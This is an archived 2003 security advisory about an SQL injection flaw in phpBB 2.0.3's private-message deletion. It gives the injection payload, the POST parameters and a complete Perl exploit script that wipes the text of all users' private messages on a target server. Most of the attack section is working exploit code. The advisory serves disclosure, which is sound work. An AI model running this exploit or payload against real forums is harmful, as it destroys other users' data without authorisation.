Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: web5938.htm

phpBB SQL Injection vulnerability



20th Jan 2003 [SBWID-5938]
COMMAND

	phpBB SQL Injection vulnerability

SYSTEMS AFFECTED

	phpBB 2.0.3, possibly others

PROBLEM

	Ulf Harnhammar [ulfh@update.uu.se] of VSU Security posted :
	
	The function for deleting private messages  has  got  an  SQL  Injection
	hole. If we submit data saying that we want to  delete  private  message
	number "1) OR 1=1 #", the text of all private messages for all users  on
	the system will be deleted.
	
	The messages are stored in two tables, and the SQL Injection  will  only
	work on one of them,  so  all  the  text  bodies  are  deleted  but  the
	subjects and metadata are only deleted if they  belong  to  the  current
	user. This means that the subjects of the deleted  messages  will  still
	show up in the other users' folders. When a user  clicks  on  a  deleted
	message, he or she will just be redirected back to the folder.
	
	You  can   exploit   this   by   POSTing   the   following   values   to
	privmsg.php?folder=inbox&sid=[THE SID VALUE]:
	
	  mode=""
	  delete="true"
	  mark[]="1) OR 1=1 #"
	  confirm="Yes"
	
	The current SID value is shown in the URL field, if you log  in  to  the
	system with cookies turned off.
	
	#!/usr/bin/perl --
	
	# phpBB delete the text of all users' private messages exploit
	# Ulf Harnhammar
	# January 2003
	
	use Socket;
	
	if (@ARGV != 2) { die "usage: $0 host sid\n"; }
	
	($host, $sid) = @ARGV;
	$host =~ s|\s+||g;
	$sid =~ s|\s+||g;
	
	$crlf = "\015\012";
	$http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
	        "Host: $host$crlf".
	        "User-Agent: Mozzarella/1.37++$crlf".
	        "Referer: http://www.phpbb.com/$crlf".
	        "Connection: close$crlf".
	        "Content-Type: application/x-www-form-urlencoded$crlf".
	        "Content-Length: 58$crlf$crlf".
	        "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";
	
	$tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
	$hosti = inet_aton($host) or die "Couldn't look up host!\n";
	$hosts = sockaddr_in(80, $hosti);
	
	socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
	connect(SOK, $hosts) or die "Couldn't connect to port!\n";
	
	select SOK; $| = 1; select STDOUT;
	
	print SOK $http;
	
	$junk = '';
	while (<SOK>) { $junk .= $_; }
	
	close SOK or die "Couldn't close!\n";
	

SOLUTION

	get version 2.0.4


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH